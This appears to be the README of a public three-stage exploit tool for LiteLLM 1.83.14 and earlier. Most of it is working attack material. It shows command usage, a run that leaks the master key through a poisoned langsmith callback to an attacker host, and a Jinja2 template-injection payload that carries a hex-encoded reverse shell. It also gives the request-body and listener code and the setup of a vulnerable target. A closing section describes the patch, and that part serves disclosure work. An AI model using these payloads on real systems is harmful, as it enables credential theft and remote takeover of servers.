LiteLLM 1.83.14 — Remote Code Execution via Master Key Leak and Jinja2 SSTI
Three-stage exploit tool targeting LiteLLM versions ≤ 1.83.14. Achieves remote code execution (interactive shell or arbitrary command) against a default production deployment given only a standard internal_user API key.
Want to know how it works? Read the blog post RCEliteLLM – LiteLLM 1.83.14: Chaining an Environment Variable Leak with Jinja2 SSTI for Remote Code Execution.
Demo video: RCEliteLLM.mp4
============================================================================
______ _____ _____ _ _ _ _ _ ___ ___
| ___ \ / __ \ | ___| | | (_) | | | | | | | \/ |
| |_/ / | / \/ | |__ | | _ | |_ ___ | | | | | . . |
| / | | | __| | | | | | __/ _ \ | | | | | |\/| |
| |\ \ | \__/\ | |___ | | | | | || __/ | |____ | |____ | | | |
\_| \_| \____/ \____/ |_| |_| \__\___| \_____/ \_____/ \_| |_/
====================== github.com/McCaulay/RCEliteLLM ======================
usage: RCEliteLLM.py [-h] -k API_KEY -r RHOST [-rp RPORT] [-rs] -l LHOST [-lp LPORT]
[-sp SHELL_PORT] [-m MODEL] [-c COMMAND] [-t TIMEOUT]
[--callback-wait CALLBACK_WAIT] [-mk MASTER_KEY] [-p PROMPT_ID] [-lk]
LiteLLM 1.83.14: RCE via Master Key Leak and Jinja2 SSTI
options:
-h, --help show this help message and exit
-k API_KEY, --api-key API_KEY
A valid LiteLLM API key with internal_user role
-r RHOST, --rhost RHOST
Base URL of the LiteLLM proxy (e.g. 10.0.0.1)
-rp RPORT, --rport RPORT
Port for the LiteLLM proxy (default: 4000)
-rs, --rssl If LiteLLM proxy is using SSL (default: False)
-l LHOST, --lhost LHOST
Attacker IP/hostname reachable from the target
-lp LPORT, --lport LPORT
Attacker listener port for both callback and GitLab server (default:
8888)
-sp SHELL_PORT, --shell-port SHELL_PORT
Reverse shell listener port (default: 31337)
-m MODEL, --model MODEL
Model name for completion calls (default: auto-detected)
-c COMMAND, --command COMMAND
Shell command to execute on target (default: reverse shell)
-t TIMEOUT, --timeout TIMEOUT
HTTP request timeout in seconds (default: 60)
--callback-wait CALLBACK_WAIT
Seconds to wait for the langsmith callback batch (default: 15)
-mk MASTER_KEY, --master-key MASTER_KEY
Skip master key leak if provided (default: auto-leak)
-p PROMPT_ID, --prompt-id PROMPT_ID
Prompt ID for the SSTI payload (default: auto-generated)
-lk, --leak-only Only leak the master key, do not execute commands (default: False)
The following example shows an attacker (192.168.3.95) targeting a victim (192.168.3.78) running LiteLLM 1.83.14. The internal_user API key (sk-GbNPQmzQa_JTP-2N9CQDtg) is used to leak the master key (sk-XawG5kCdnbY_eUrDzINwDR8HPAVhJjExLoZB8gg0_8c). The master key is then used in stage 3 to trigger code execution.
user@user:~/$ hostname -I
192.168.3.95
user@user:~/$ python3 RCEliteLLM.py \
--api-key "sk-GbNPQmzQa_JTP-2N9CQDtg" \
--rhost "192.168.3.78" \
--lhost "192.168.3.95"
============================================================================
______ _____ _____ _ _ _ _ _ ___ ___
| ___ \ / __ \ | ___| | | (_) | | | | | | | \/ |
| |_/ / | / \/ | |__ | | _ | |_ ___ | | | | | . . |
| / | | | __| | | | | | __/ _ \ | | | | | |\/| |
| |\ \ | \__/\ | |___ | | | | | || __/ | |____ | |____ | | | |
\_| \_| \____/ \____/ |_| |_| \__\___| \_____/ \_____/ \_| |_/
====================== github.com/McCaulay/RCEliteLLM ======================
[#] LiteLLM Version: 1.83.14
[#] Auto-detected model: smollm2:135m
[#]
[#] Stage 1: Creating poisoned key with langsmith callback
[#] Callback URL: http://192.168.3.95:8888
[+] Poisoned key: sk-4WQ6KS4zjfWJOMfPRrjcnA
[+] callback_vars
[+] langsmith_api_key: LITELLM_MASTER_KEY
[+] langsmith_project: exfil
[+] langsmith_base_url: http://192.168.3.95:8888
[#]
[#] Stage 2: Triggering leak via completion call with poisoned key
[#] Triggered completion call
[#] Waiting for langsmith callback...
[#] 192.168.3.78 POST /api/v1/runs/batch x-api-key=sk-XawG5kCdnbY_eUrDzINwDR8HPAVhJjExLoZB8gg0_8c
[+] Leaked master key: sk-XawG5kCdnbY_eUrDzINwDR8HPAVhJjExLoZB8gg0_8c
[#] Starting reverse shell listener on 0.0.0.0:31337
[#] Reverse shell listener ready on port 31337
[#]
[#] Stage 3: RCE via Jinja2 SSTI (GitLab prompt integration)
[#] Reverse shell: 192.168.3.95:31337
[#] SSTI payload: {{
cycler.__init__.__globals__['__builtins__']['__import__']('subprocess').Popen(
[
cycler.__init__.__globals__['__builtins__']['__import__']('sys').executable,
'-c',
'import socket,os,sys;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.3.95",31337));
exec(bytes.fromhex("
5b6f732e6475703228732e66696c656e6f28292c692920666f72206920696e2072616e67652833295d0a69
6d706f7274207074790a7074792e737061776e28272f62696e2f736827290a
").decode())
if sys.platform!="win32" else
exec(bytes.fromhex("
696d706f72742073756270726f636573732c746872656164696e670a703d73756270726f636573732e506f
70656e285b27636d642e657865275d2c737464696e3d73756270726f636573732e504950452c7374646f75
743d73756270726f636573732e504950452c7374646572723d73756270726f636573732e5354444f55542c
62756673697a653d30290a646566207228293a0a207768696c6520547275653a0a2020643d702e7374646f
75742e726561642834303936290a20206966206e6f7420643a627265616b0a2020732e73656e64616c6c28
64290a646566207728293a0a207768696c6520547275653a0a2020643d732e726563762834303936290a20
206966206e6f7420643a627265616b0a2020702e737464696e2e77726974652864293b702e737464696e2e
666c75736828290a743d746872656164696e672e546872656164287461726765743d722c6461656d6f6e3d
54727565290a753d746872656164696e672e546872656164287461726765743d772c6461656d6f6e3d5472
7565290a742e737461727428293b752e737461727428293b742e6a6f696e28290a
").decode())
'
]
)
}}
[#] Creating prompt '7b6b2880-583f-4fe9-986e-15ea21d69d7e' via POST /prompts
[#] 192.168.3.78 GET
/api/v4/projects/1/repository/files/7b6b2880-583f-4fe9-986e-15ea21d69d7e.v1.prompt/raw
[#] Prompt created with id 7b6b2880-583f-4fe9-986e-15ea21d69d7e.v1
[#] Triggering SSTI via LLM call
[#] Triggered completion call
[#]
[#] Waiting for reverse shell connection...
[+] Reverse shell from 192.168.3.78:47430
$ id
uid=1000(victim) gid=1000(victim) groups=1000(victim)
$ hostname -I
192.168.3.78
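Stage 1 above hinges on key-scoped logging metadata: the poisoned key carries langsmith callback_vars whose langsmith_api_key field is the literal string LITELLM_MASTER_KEY, which vulnerable versions resolve through get_secret() into the real environment value before shipping callback batches. A minimal sketch of the request body (the exact /key/generate metadata schema is an assumption inferred from the tool output above, not taken from the tool's source):

```python
import json

# Hypothetical sketch of the Stage 1 /key/generate body. Field names
# ("logging", "callback_name", "callback_vars") are assumptions inferred
# from the transcript; verify them against the targeted LiteLLM version.
def poisoned_key_body(attacker_url: str) -> dict:
    return {
        "metadata": {
            "logging": [{
                "callback_name": "langsmith",
                "callback_vars": {
                    # Literal env-var name: the vulnerable proxy substitutes
                    # the real master key via get_secret() before the
                    # langsmith callback fires.
                    "langsmith_api_key": "LITELLM_MASTER_KEY",
                    "langsmith_project": "exfil",
                    "langsmith_base_url": attacker_url,
                },
            }],
        },
    }

print(json.dumps(poisoned_key_body("http://192.168.3.95:8888"), indent=2))
```

POSTing a body of this shape to /key/generate with the internal_user key yields the poisoned key that Stage 2 then uses for a completion call.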
One-shot command execution:
python3 RCEliteLLM.py \
-k "sk-GbNPQmzQa_JTP-2N9CQDtg" \
-r "192.168.3.78" \
-l "192.168.3.95" \
-c "id > /tmp/poc.txt"
Skip the leak stage (master key already known):
python3 RCEliteLLM.py \
-mk "sk-XawG5kCdnbY_eUrDzINwDR8HPAVhJjExLoZB8gg0_8c" \
-r "192.168.3.78" \
-l "192.168.3.95" \
-c "id > /tmp/poc.txt"
Leak master key only:
python3 RCEliteLLM.py \
-k "sk-GbNPQmzQa_JTP-2N9CQDtg" \
-r "192.168.3.78" \
-l "192.168.3.95" \
--leak-only
Install the vulnerable LiteLLM version on the target:
pip install litellm==1.83.14
litellm --version
# Expected: litellm, version 1.83.14
The exploit requires a database for key management (POST /key/generate) and prompt storage (POST /prompts).
The following example creates a database litellm with the user/pass victim:victim.
# Install PostgreSQL
sudo apt install postgresql
# Create database
sudo -u postgres createdb litellm
sudo -u postgres createuser --superuser victim
sudo -u postgres psql -c "ALTER USER victim WITH PASSWORD 'victim';"
The DATABASE_URL will be set to postgresql://victim:victim@127.0.0.1:5432/litellm as an environment variable when starting the proxy.
The exploit needs at least one model configured. Any LLM backend works.
For example, Ollama with a small model can be installed as follows.
curl -fsSL https://ollama.com/install.sh | sh
ollama pull smollm2:135m
ollama serve # runs on port 11434
Create litellm_config.yaml containing the model information:
model_list:
- model_name: smollm2:135m
litellm_params:
model: ollama/smollm2:135m
api_base: "http://localhost:11434"
Critical: LITELLM_MASTER_KEY must be set as an environment variable. This is standard practice in Docker/production deployments.
export LITELLM_MASTER_KEY="sk-XawG5kCdnbY_eUrDzINwDR8HPAVhJjExLoZB8gg0_8c"
export DATABASE_URL="postgresql://victim:victim@127.0.0.1:5432/litellm"
litellm --config litellm_config.yaml --port 4000
Expected output:
INFO: Started server process [12345]
INFO: Waiting for application startup.
...
INFO: Application startup complete.
INFO: Uvicorn running on http://0.0.0.0:4000
The exploit requires an API key with internal_user role (the standard role for API key holders).
MASTER_KEY="sk-XawG5kCdnbY_eUrDzINwDR8HPAVhJjExLoZB8gg0_8c"
# Create a user with internal_user role
curl -X POST http://localhost:4000/user/new \
-H "Authorization: Bearer $MASTER_KEY" \
-H "Content-Type: application/json" \
-d '{"user_id": "developer", "user_role": "internal_user"}'
# Create an API key for this user
curl -X POST http://localhost:4000/key/generate \
-H "Authorization: Bearer $MASTER_KEY" \
-H "Content-Type: application/json" \
-d '{"user_id": "developer"}'
The returned key value is the --api-key value for the exploit.
API_KEY="<key from Step 6>"
# Health check
curl http://localhost:4000/health/liveness
# Expected: "I'm alive!"
# Verify key works for completions
curl -X POST http://localhost:4000/v1/chat/completions \
-H "Authorization: Bearer $API_KEY" \
-H "Content-Type: application/json" \
-d '{"model": "smollm2:135m", "messages": [{"role": "user", "content": "hi"}]}'
# Expected: 200 with completion response
# Verify key can create new keys (internal_user role)
curl -X POST http://localhost:4000/key/generate \
-H "Authorization: Bearer $API_KEY" \
-H "Content-Type: application/json" \
-d '{}'
# Expected: 200 with new key details
# Verify LITELLM_MASTER_KEY is in the proxy's environment
cat /proc/$(pgrep -f "litellm" | head -1)/environ | tr '\0' '\n' | grep LITELLM_MASTER_KEY
# Expected: LITELLM_MASTER_KEY=sk-XawG5kCdnbY_eUrDzINwDR8HPAVhJjExLoZB8gg0_8c
The attacker needs:
- Outbound access to the target's proxy port (4000)
- An inbound port accessible from the target (8888) for the callback listener and fake GitLab server
- (Optional) An inbound port accessible from the target (31337) for the reverse shell
The target needs:
- LiteLLM proxy listening on a reachable port (4000)
- Outbound HTTP connectivity to the attacker (for the langsmith callback and fake GitLab API)
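Both inbound roles on port 8888 can be served by a single process: POSTs are the langsmith callback batches (the leaked master key arrives in the x-api-key header, as seen in Stage 2), and GETs are answered like GitLab's raw-file endpoint, returning the SSTI payload. A minimal sketch of such a listener (routing inferred from the transcript, not the tool's actual implementation; the payload here is a harmless placeholder):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

PAYLOAD = b"{{ 7 * 7 }}"  # placeholder; the real SSTI payload is shown above

class LeakHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        # Langsmith callback batch: consume the body, log the leaked key.
        self.rfile.read(int(self.headers.get("Content-Length", 0)))
        key = self.headers.get("x-api-key", "")
        print(f"[#] {self.client_address[0]} POST {self.path} x-api-key={key}")
        self.send_response(200)
        self.end_headers()

    def do_GET(self):
        # Fake GitLab raw-file endpoint: serve the prompt containing the payload.
        self.send_response(200)
        self.send_header("Content-Length", str(len(PAYLOAD)))
        self.end_headers()
        self.wfile.write(PAYLOAD)

    def log_message(self, *args):
        pass  # suppress default per-request logging

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8888), LeakHandler).serve_forever()
```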
Both vulnerabilities are fully patched in LiteLLM 1.84.0-rc.1:
- get_secret() removed from convert_key_logging_metadata_to_callback(). A new validate_no_callback_env_reference() validator blocks os.environ/-prefixed strings in callback config. Langsmith/Langfuse set allow_env_credentials=False when a custom base_url is provided.
- All prompt managers (GitLab, BitBucket, Arize, Dotprompt, HuggingFace) replaced with ImmutableSandboxedEnvironment.
This tool targets LiteLLM ≤ 1.83.14 only.
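The sandbox half of the fix can be checked in isolation: Jinja2 ships cycler as a default template global, and ImmutableSandboxedEnvironment refuses the dunder traversal the Stage 3 payload relies on. A sketch using a harmless expression in place of Popen (assumes the jinja2 package is installed):

```python
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import ImmutableSandboxedEnvironment

# Same traversal shape as the Stage 3 payload, but calling len() instead
# of spawning a process.
probe = "{{ cycler.__init__.__globals__['__builtins__']['len']('pwned') }}"

# Unsandboxed rendering (<= 1.83.14 behaviour): the traversal reaches builtins.
print(Environment().from_string(probe).render())  # -> 5

# Sandboxed rendering (1.84.0-rc.1 behaviour): dunder access is blocked.
try:
    ImmutableSandboxedEnvironment().from_string(probe).render()
except SecurityError as e:
    print("blocked:", e)
```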